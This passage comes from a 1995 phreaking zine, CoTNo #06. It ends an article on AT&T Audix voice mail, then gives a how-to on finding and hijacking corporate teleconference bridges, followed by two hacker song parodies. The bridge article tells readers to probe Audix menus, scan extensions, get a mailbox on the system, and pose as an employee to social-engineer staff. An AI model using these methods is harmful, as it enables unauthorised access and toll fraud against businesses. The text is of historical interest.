The system software resides on a single 160 meg casettee tape. It is loaded
on the hard disk whenever an installation or upgrade is being performed.
There is also a big part of the code, which constantly monitors multiple
thermal sensors on the two circuit packs, making sure that they don't over
heat.
The chick's sweet voice you hear when interacting with the VMS, is composed
of multiple fragments. A fragment can be a single word, a complete sentence,
or a bunch of sentences. For example, "Please enter extension and pound sign"
is most likely to be two fragments. The first being "please enter extension"
and the second being "and pound sign". Obviously, this is used to save space.
A second recording is: "Enter password and pound sign", the "and pound sign"
is the same fragment as in the first one. Since AT&T sells it's Audix system
in nearly 80 countries, there are a couple of different language tapes also.
So don't be surprised if you encounter a Spanish or Japanese Audix VMS.
Currently AT&T offers ten language tapes and the Definity Audix can support
up to nine different language tapes simultaneously.
"So if it's an Audix voice mail then there's a Definity PBX, right? "
Wrong. Even though it fits the Definity PBX like a glove, it can be integrated
with other switches. Some of the most common are:
- G3I - System 25
- G3S - System 75
- G3R - System 85
I'm not sure about NorTel switches such as the SL-1, some people say yes,
while others say that only AT&T switches can be integrated with Audix. If
anyone knows, please let me know. Comments or suggestions are welcome.
- Boba Fett
<EOF>
<05/23/95>
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
/\
\/
Bridging the Gap
/\-------------------------/\
\/-------------------------\/
Eddie Van Halen
/\
\/
INTRODUCTION
------------
First of all I wrote this because for one thing I am SICK AND TIRED of sitting
on irc and seeing "k0nPhiNf0!?" pumped through my terminal every five seconds.
Then,once they get the k0nPh iNf0, I am forced to constantly hear from the
k0nPh people about how "DiZ k0nPh sUx!". People give me k0nPh info all the
time but I NEVER call into them. Why? Because these days,they DO suck. It
seems the underground world have completely forgotten about what use to be
the best way to conference - BRIDGE's.
ABOUT BRIDGES
-------------
I'm sure everyone reading this knows what a bridge is. Whether they know the
best way to get them is another thing. I do, however, run across the
occasional irc'er that /msgs me with "whats a bridge?" when I bring up the
subject.
Bridges are just about the same as k0nPhz, except they are usually owned and
used by big businesses and schools on their own telephone equipment. This
equipment is usually integrated into their voice mail and/or PBX computers
and allows the company or school to hold teleconferences without relying on
the national teleconference providers.
For those out there (if any?) that remember the 904-348 bridge, it was a
System 75 PBX bridge used by a home school, where the students would call in
in the daytime and take tests and attend classes. The way it was used was as
follows:
You would dial 348-XX00 to 348-XX19. That was ONE of the bridges.
Anybody that connected to any number from 00 to 19 would be connected
to the bridge. If two people tried to connect to the same number, it
would be busy. Thus, it had 20 lines. A second bridge was reached at
348-XX20 to 348-XX29. This was off the same system, but gave you a
different bridge with 10 lines. Yet another bridge could be found at
348-XX30 to 348-XX69 off the same system.
You could call in during the daytime and mess with the teachers and kids or
whatever, but occasionally they would hang you up, or call you back or
something. This one went down because it wasn't blocked from collect calls,
and the number got very widespread throughout the k0d3lyN3 and BBS world and
was constantly collect-called by lamers who didn't know how to phreak. It is,
however, occasionally up for the students to use, but goes down as soon class
is over.
FINDING A BRIDGE.
-----------------
Finding a bridge use to be the easiest thing for me. It used to be, like,
WHAT I DID. I would put one up on my codeline, and spread it to the others,
and would call into QSD or Lutz or something about 30 minutes afterward
and get messages from people who I didn't even know saying "Hey,man,thanx
for puttin up that bridge!". These days I don't even bother. I don't WANT
to talk to half these idiots that are around today.
Anyway, lets say you want to find a bridge. Go through the phonebook and look
up the all the big businesses. Call the main numbers that you find after
hours and find out which ones have voice mail systems. In this article, I
will focus on the Audix voicemail system made by AT&T so look for those. To
tell if your target is using Audix, press *8 during the greet, and if it says
"Enter the four digit extension and pound sign." you have found one. A
complete guide to hacking Audix voice mail can be found in CoTNo #1,
article #1. Railroad companies like CSX and AT&T owned companies like
Transtech, or Card Services often have Audix systems with bridges.
Once you have the targeted Audix system,you need to start scanning for the
system extensions. Hit *6 for the names directory and try entering
CONFERENCE, BRIDGE, or TELE. You COULD possibly get the actual extension to
the bridge spit out right at you (as with CSX's system),or at least most
systems have that extension where you hear the person state their name
"Conference Planning". If this is the case,you need to get a voice mail
box off the system and send a message to whatever extension Conference
Planning is saying something like "Yes, I need a conference set up for
such and such a date & such and such a time". This will more than likely
work and Conference Planning will respond usually with either "No problem,
the teleconference bridge is at XXXX" or "All we need is the PIN
number you want."
However, a lot of systems do not have their *6 directory system configured
very good at all, so you might want to try scanning all the XX00 and XX99
and find out where all the computer-related extensions are located at.
Or you might want to social engineer it out of one of the people located
at an extension. Try calling from within your box and acting like you work
there.
Once you have found what you think is the bridge,you need to test it out
with a friend. If he calls into the same extension and gets a busy signal,
you may want tell him to try the next extension up. If the bridge is
multi-lined, have him figure out how many lines the bridge has and make
sure the lines are all going to the same bridge and not 3 different
bridges or something. Note that if you are scanning on a Railroad
companies system, you will sometimes come to an extension you might think
is a bridge and end up to be dispatchers. So once you sign on to what you
believe is the bridge,hit a few dtmf tones and make sure you don't hear
someone say "You done hittin funny buttons!!!" or "dispatcher,mike."
SECURITY ON A BRIDGE.
---------------------
Security on a bridge is a lot different than on an alliance or on a k0nPh.
You usually don't have to worry about it getting cancelled and the bridge
usually will not ever go down if you don't third-party or collect call to
it. You are not dealing with the phone company here, you are dealing
with whatever business owns it, and if they detect a lot of activity on
the extension, they will usually either warn you to leave by recording the
conversations and playing them back to you, or just change the extension.
DO expect to be dealing with the business communication security person,
though, at one time or another. They will usually talk to you and explain to
you why they need you to leave, and most of the time I found out, it wasn't
because of the people using their bridge, it was because of the collect-
calling, third party billing or the fact that people were using it via the
800 number and the company was having to pick up the tab. I don't recommend
finding a bridge and giving it to the entire world because when you are
not on, you don't know what goes on in the conversation, and if the company
does finally decide to get it investigated, the investigators seem to go
after the same thing every time: the source that gave out the bridge in
the first place.
CONCLUSION
----------
Hopefully you have learned something from all this. With a little time and
patience, you can set up a bridge that will last for weeks, maybe months.
And besides, hacking out a phone system will teach you a lot more than
than setting up a k0nPh off your neighbor's phone terminal. So next time
you see someone flash "k0nPhiNf0!?", tell them to get off there ass and
try hacking one out for a change.
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
Elite Music Part V
- Disk Jockey/WR -
Please note the /WR. Until now I have not been in textfiles at large, only
a few given to good friends. There have been other `DJ's out there; as many
as six by my count, so far. So even that my group has had but one member
for over four years, I keep the tag to distinguish myself.
Well, while on a (pretty lame, I must admit) conference with a barrage of
lame people, sending streams of DTMF tones, long belches, humming, and
music down the line, I got an idea. At one point the B-52's `Roam' was
played in the background during a half-intelligent discussion of cellular
telecommunications. These lyrics almost came to me almost immediately, and
these are the results. I intend to record this song for real in a few
months or so; I do have the instrumental of the real song and it would be
somewhat fun to do. Maybe a .AU will be out there on the Web, sometime...
and by that time these lame people might grow up. (But, I can't ask for
everything.)
"Phone Roam"
Roam cyberspace, switching through every carrier
Oh girl won't you lend me one of those codes
Take it trunk to trunk, hopping through the satellites
Around the world, the call flags switchboard lights
Roam if you want to, roam around the world
Roam if you want to, without codes, without cards
Roam if you want to, roam around the world
Roam if you want to, without anything but an ESN
Hit conferences where you'll lose your mind
Toners and lamers, leave them all behind
Take it trunk to trunk, hopping through the satellites
Around the world, the call flags switchboard lights
Roam if you want to, roam around the world
Roam if you want to, without codes, without cards
Roam if you want to, roam around the world
Roam if you want to, without anything but an ESN
Go ahead and roam, go ahead and roam
Scan all you can while the Feds trace you
Hack up PBXs till your hands get tired
Take it trunk to trunk, hopping through the satellites
Around the world, the call flags switchboard lights
Roam if you want to, roam around the world
Roam if you want to, without codes, without cards
Roam if you want to, roam around the world
Roam if you want to, without anything but an ESN
Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites
Take it trunk to trunk, hopping through the satellites
Go ahead and roam, go ahead and roam
<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>=<CoTNo>
End of CoTNo #06
I know you expect some snappy ending as usual to another successful issue
of Communications of The New Order, but considering the grimness of much
of this issue I don't think it would be appropriate. Despite all of the
bad news that was presented in this issue, I hope that everyone will
"keep the faith", as it were. Explore, learn, educate. But don't do
anything stupid. The powers that be are becoming increasingly intent
upon stopping those who are labeled as "hackers". And everyday, there
are more of us for them to stop. Everyday, we are being introduced to
new technologies that few people understand, and few people want to
understand. Our desire to understand can be achieved, but we must be
careful.
Even though you just read this issue's Elite Music, I thought I would
finish off with another song that has special significance to me. This
showed up in my e-mail the other day and it really made me think. I
hope it is as meaningful to you as it was for me...
TNO MAN
-------
To the Tune of Desperado, by The Eagles
TNO man, why don't you come to your senses?
You been out jumping' fences into those Bell yards.
Oh you're a smart one, I know that you got your reasons,
these things that are pleasin' can hurt you somehow.
Don't you hack on those old .mil sites,
they'll catch you if you're lazy,
you know diverting twice is always your best bet.
Now it seems to me some eleet things
have been shown upon your screen
but you only want the ones that you can't hack.
TNO man, oh you ain't gettin' no younger,
your hunger for knowledge, it's drivin' you on.
And hacking, oh hacking, well that's just some people talkin',
your prison is waitin' at the end of the line.
Don't your power get old on the Internet?
The account won't die and the root won't mind,
it's hard to tell the night time from the day.
You're losin' all your highs and lows,
ain't it funny how the feelin' goes away?
TNO man, why don't you come to your senses?
Come down from your firewalls, open the gateway.
It may be laming' but there's a job waiting for you.
You better let somebody hire you LET SOMEBODY HIRE YOU
you better let somebody hire you before it's too late.
- Don Henley, Glenn Frey and the Voyager